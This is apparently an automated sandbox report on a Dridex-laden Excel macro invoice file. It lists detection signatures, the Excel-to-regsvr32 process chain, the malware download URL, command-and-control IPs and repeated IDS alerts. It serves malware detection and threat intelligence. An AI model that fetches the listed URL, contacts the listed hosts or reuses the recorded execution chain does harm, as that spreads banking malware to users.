Loading ...

Play interactive tourEdit tour

Analysis Report INV8073565781-20210111319595.xlsm

Overview

General Information

Sample Name:INV8073565781-20210111319595.xlsm
Analysis ID:338240
MD5:9b7c2b0abf5478ef9a23d9a9e87c7835
SHA1:6931c4b845a8a952699d9cf85b316e3b3d826a41
SHA256:a463f9a8842a5c947abaa2bff1b621835ff35f65f9d3272bf1fa5197df9f07d0

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: BlueMashroom DLL Load
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the installation date of Windows
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2300 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 960 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll. MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 3008 cmdline: -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll. MD5: 432BE6CF7311062633459EEF6B242FB5)
    • DW20.EXE (PID: 2432 cmdline: 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1016 MD5: 45A078B2967E0797360A2D4434C41DB4)
      • DWWIN.EXE (PID: 3068 cmdline: C:\Windows\system32\dwwin.exe -x -s 1016 MD5: 25247E3C4E7A7A73BAEEA6C0008952B1)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 61074", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 0"]}

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: BlueMashroom DLL LoadShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2300, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll., ProcessId: 960
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2300, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll., ProcessId: 960
Sigma detected: Regsvr32 AnomalyShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2300, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll., ProcessId: 960

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://wexfashion.com/k04qkvqu.zipAvira URL Cloud: Label: malware
Found malware configurationShow sources
Source: 4.2.regsvr32.exe.810000.1.raw.unpackMalware Configuration Extractor: Dridex {"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 61074", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 0"]}
Multi AV Scanner detection for submitted fileShow sources
Source: INV8073565781-20210111319595.xlsmVirustotal: Detection: 44%Perma Link
Source: INV8073565781-20210111319595.xlsmReversingLabs: Detection: 32%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\k04qkvqu[1].zipJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\cjrumqtd.dllJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49179 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49183 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49187 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49191 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49195 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49199 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49203 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49207 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49211 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49215 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49219 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49224 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49229 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49233 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49237 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49241 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49245 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49249 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49253 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49257 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49257 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49261 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49265 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49269 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49273 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49277 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49281 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49285 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49289 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49293 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49297 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49301 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49305 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49309 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49313 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49317 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49321 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49325 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49325 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49329 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49333 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49337 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49341 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49345 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49349 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49353 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49357 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49361 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49365 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49369 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49373 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49377 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49381 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49385 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49389 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49393 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49397 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\cjrumqtd.dllJump to behavior
Document exploit detected (drops PE files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: k04qkvqu[1].zip.0.drJump to dropped file
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
Source: global trafficDNS query: name: wexfashion.com
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 77.220.64.37:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.54.125.162:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49166
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49168
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49169
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49169
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49171
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49172
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49173
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49173
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49175
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49176
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49177
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49177
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49179
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49180
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49181
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49181
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49183
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49184
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49185
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49185
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49187
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49188
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49189
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49189
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49191
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49192
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49193
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49193
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49195
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49196
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49197
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49197
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49199
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49200
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49201
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49201
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49203
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49204
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49205
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49205
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49207
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49208
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49209
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49209
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49211
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49212
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49213
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49213
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49215
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49216
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49217
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49217
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49219
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49220
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49221
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49221
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49224
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49225
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49227
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49227
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49229
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49230
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49231
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49231
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49233
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49234
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49235
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49235
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49237
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49238
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49239
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49239
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49241
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49242
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49243
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49243
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49245
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49246
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49247
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49247
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49249
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49250
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49251
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49251
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49253
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49254
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49255
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49255
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49257
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49258
